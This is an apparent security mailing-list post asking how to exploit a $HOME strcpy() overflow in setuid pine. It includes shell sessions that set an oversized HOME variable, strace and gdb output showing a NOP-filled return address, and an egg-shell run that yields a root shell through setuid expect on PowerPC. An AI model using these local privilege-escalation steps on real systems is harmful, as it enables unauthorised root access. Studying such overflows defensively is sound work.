Pine

[Charles Stevenson <core () ezlink com>]

Hi all,

Has anyone ever coded a pine exploit.  I know it's vulnerable to a $HOME
strcpy() problem.  And I have seen it suid this or that on several ISPs
even though it shouldn't be ever!  What are the implications of this
with pine itself can you simply run a command from within it.  I don't
think pine was designed to be run as a suid and I'm not sure why anyone
would give it such permissions. 

[-(root@devastator:~/bleedingedge)> export HOME=`perl -e 'print "i" x
6969'`           [-(:1-07-11-20:20:51)-]<p0>
[-(root@devastator:/home/core/bleedingedge)>
pine                                      [-(:1-07-11-20:21:10)-]<p0>
zsh: segmentation fault  pine
[-(root@devastator:/home/core/bleedingedge)> strace
pine                               [-(:1-07-11-20:21:12)-]<p0>
execve("/usr/bin/pine", ["pine"], [/* 20 vars */]) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40007000
mprotect(0x40000000, 20353, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=8183, ...}) = 0
open("/etc/ld.so.cache", O_RDONLY)      = 3
mmap(0, 8183, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000
close(3)                                = 0
stat("/etc/ld.so.preload", 0xbfffe180)  = -1 ENOENT (No such file or
directory)
open("/lib/libtermcap.so.2", O_RDONLY)  = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 12288, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000a000
mmap(0x4000a000, 7276, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0)
= 0x4000a000
mmap(0x4000c000, 3496, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
0x1000) = 0x4000c000
close(3)                                = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
open("/lib/libc.so.5", O_RDONLY)        = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 831488, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4000d000
mmap(0x4000d000, 599154, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3,
0) = 0x4000d000
mmap(0x400a0000, 22664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
0x92000) = 0x400a0000
mmap(0x400a6000, 200812, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400a6000
close(3)                                = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
munmap(0x40008000, 8183)                = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_EXEC) = 0
mprotect(0x40000000, 20353, PROT_READ|PROT_EXEC) = 0
personality(PER_LINUX)                  = 0
geteuid()                               = 0
getuid()                                = 0
getgid()                                = 0
getegid()                               = 11
brk(0x81abb88)                          = 0x81abb88
brk(0x81ac000)                          = 0x81ac000
getpid()                                = 21010
time(NULL)                              = 994904475
getuid()                                = 0
open("/etc/nsswitch.conf", O_RDONLY)    = 3
brk(0x81af000)                          = 0x81af000
fstat(3, {st_mode=S_IFREG|0644, st_size=1215, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40008000
read(3, "#\n# /etc/nsswitch.conf\n#\n# An"..., 4096) = 1215
read(3, "", 4096)                       = 0
close(3)                                = 0
munmap(0x40008000, 4096)                = 0
open("/etc/passwd", O_RDONLY)           = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=28709, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40008000
read(3, "root:x:0:0::/root:/bin/sh\ndaemo"..., 4096) = 4096
lseek(3, -4070, SEEK_CUR)               = 26
close(3)                                = 0
munmap(0x40008000, 4096)                = 0
brk(0x81b1000)                          = 0x81b1000
ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

[-(root@devastator:~/bleedingedge/test)>
./exploit4                                   
[-(:1-07-11-20:34:22)-]<p0>
Using address: 0xbffffcc4
[root@devastator ~/bleedingedge/test]# export HOME=$EGG
[root@devastator /home/core/bleedingedge/test]# gdb pine
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for
details.
GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation,
Inc...
(gdb) r
Starting program: /usr/bin/pine 
zsh: path too long: .zshenv

Program received signal SIGSEGV, Segmentation fault.
0x4007a43f in strcpy ()
(gdb) bt
#0  0x4007a43f in strcpy ()
#1  0x804a590 in _start ()
#2  0x90909090 in ?? ()
Cannot access memory at address 0x90909090.
(gdb) frame 0
#0  0x4007a43f in strcpy ()
(gdb) list
pine.c:252: No such file or directory.


Also I'm not quite understanding coding overflows on x86. I cant seem to
overwrite the eip and my attempts on expect and pine both segfault.  Can
someone tell me what I'm missing.  It's harder but easier on ppc arch.
:)

I mean it works so well on my iBook!

[ Buffer size:  512             Egg size:       2048    Aligment:      
0]
[ Address:      0x100111f8      Offset:         0                       
]
sh-2.05$ export HOME=$EGG
sh-2.05$ expect
sh-2.05# id
uid=0(root) gid=1000(core)
groups=1000(core),4(adm),24(cdrom),29(audio),30(dip)
sh-2.05# 

I don't feel like building pine for ppc but I'm sure it's just as
simple.

Thanks in advance for any x86 help.

Best Regards,
Charles Stevenson